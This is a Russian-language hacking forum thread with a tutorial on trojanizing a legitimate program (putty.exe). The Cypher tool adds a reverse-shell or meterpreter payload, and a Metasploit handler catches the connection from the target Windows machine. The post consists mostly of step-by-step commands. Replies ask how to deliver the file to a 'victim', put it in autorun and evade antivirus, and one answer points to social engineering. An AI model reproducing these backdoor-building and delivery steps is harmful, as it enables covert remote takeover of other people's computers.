• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Взлом Windows PC - Cypher

Vander

CodebyTeam
16.01.2016
1 411
4 323
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.

upload_2016-12-10_21-57-36.png


В качестве атакующей системы будет использоваться OS Kali Linux,

upload_2016-12-10_21-57-52.png


в качестве целевой системы Windows 8.1 с актуальными обновлениями.

upload_2016-12-10_21-58-7.png


Итак, вернемся к Cypher, скачиваем ее с Github:

> git clone https://github.com/xan7r/cypher

upload_2016-12-10_21-58-32.png


Выполняем следующие команды:

> cd cypher

> chmod a+x addShell.py

> ls –a

Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.

upload_2016-12-10_21-59-26.png



Теперь выполним следующую команду:

> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

upload_2016-12-10_21-59-50.png


В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.

· 0 – windows/shell_reverse_tcp

· 1 – windows/meterpreter/reverse_http

· 2 – windows/meterpreter/reverse_http +PrependMigrate

· 3 – windows/meterpreter/reverse_https

· 4 – windows/meterpreter/reverse_https +PrependMigrate

По итогу получаем файл putty_evil.exe в папке с Cypher.

upload_2016-12-10_22-0-26.png


Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
upload_2016-12-10_22-1-3.png


Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.

upload_2016-12-10_22-1-46.png


Сменим кодировку командой:

> chcp 65001

upload_2016-12-10_22-2-9.png


Посмотрим подробную информацию о системе:

> systeminfo


upload_2016-12-10_22-2-36.png


Это все. Спасибо за внимание.
 
set LHOST 192.168.0.107(это свой ip или тест машины)?
 
Всьо получилось. Мой первый "В*ЛоМ \ пронИкновение !!!" Вот только с передачей ехе. я намучялся. Посоветуйте как бы его так передать и в авторун чтоли закинуть жертве...)
 
  • Нравится
Реакции: Darwin_Douglas
Win XP Sp3 =)

8843748.png


После активации секунды две и ошибка, за эти секунды успевает только начать коннект (как видно на скрине внизу) =)
 
  • Нравится
Реакции: Vander
Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.
 
Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.

Если внимательно почитать форум и темы про социальную инженерию, сложностью это не станет. Запуск прриложения дело времени - если файло было скачано, то явно будет и запущено.
 
а как всплывающее окошко которое типа по закрытию хавает PS cделать
 
[*] Sending stage (957487 bytes) to 192.168.1.153
c 10ки пробую.
Вот такое сообщение прилетает и все более ничего не происходит в чем может быть трабл?
 
Почему выходит ошибка?


File "./addShell.py", line 28
print "\n[*] Backdoor shell was succesfully added to file!"
^
SyntaxError: Missing parentheses in call to 'print'
 
Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in <module>
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in <module>
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?
 
Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in <module>
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in <module>
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?

Ответ уже содержиться в вопросе, не хватает динамической библиотеки, судя по ошибке.
У вас Python 2.7, установите 3 версию и проблема должна исчезнуть!
Только потом не забудьте запускать именно с 3 версией, тоесть sudo python3 ./addShell.py -f putty.exe и.т.д
 
  • Нравится
Реакции: BarDimNik и Vander
Так это джойнер получается. Как у него в целом с палевностью? Есть возможность проверить твой готовый файл, к примеру, на ?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы